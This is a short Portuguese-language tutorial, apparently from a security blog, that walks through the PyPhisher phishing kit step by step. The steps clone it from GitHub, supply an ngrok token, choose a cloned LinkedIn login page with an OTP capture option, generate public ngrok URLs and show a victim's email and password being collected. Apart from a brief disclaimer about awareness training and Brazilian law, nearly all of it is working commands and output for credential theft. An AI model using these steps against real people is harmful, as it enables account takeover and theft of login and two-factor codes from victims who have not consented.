InformationSecurityPro
Marcos Henrique
PyPhisher - Gerador de Phishing
O PyPhisher é um gerador de Phishing de mais de 75 sites, dentre estes Facebook, Gmail, NetFlix, Tiktok, Twitter, Spotify e muito mais.
É recomendável utilizar esta ferramenta apenas para ações de conscientização de segurança a fim de destacar os riscos que todos estamos expostos.
🔴 O uso indevido desta ferramenta é de sua total responsabilidade e está sujeito as penalizações prevista na Lei 12.737.
01 - Passo
Realize o clone do projeto PyPhisher e liste o conteúdo do diretório :
Linuxgit clone https://github.com/KasRoudra/PyPhisher cd PyPhisher/ ls -l
02 - Passo
Execute o script pyphisher.py
Informe seu token do ngrok, caso não tenha acesse o site: ngrok e gere o seu.
Linuxpython3 pyphisher.py
03 - Passo
Informe o número correspondente ao Phishing que você deseja gerar.
Para este exemplo selecionei o número [22] LinkedIn
Você também pode optar em ativar o uso ou não do OTP (autenticação de duas etapas)
Linux[?] Select one of the options > 22 [?] Do you want OTP page? [y/n] > y
04 - Passo
Serão geradas 4 URLs para você escolher utilizar, além disso você tem a opção de customizar a URL através do recurso shadow url.
Navegador[*] URL 3 > https://597a-2804-14c-b0-a75c-00-1000.sa.ngrok.io
05 - Passo
Assim que a vítima acessar o site e preencher formulário as credencias são capturadas.
Navegadorhttps://597a-2804-14c-b0-a75c-00-1000.sa.ngrok.io Email or phone: [email protected] Password: P@ssw0rd
06 - Passo
Credenciais coletadas!
Linux[*] LinkedIn Username: [email protected] [*] Password: P@ssw0rd
São Paulo/SP
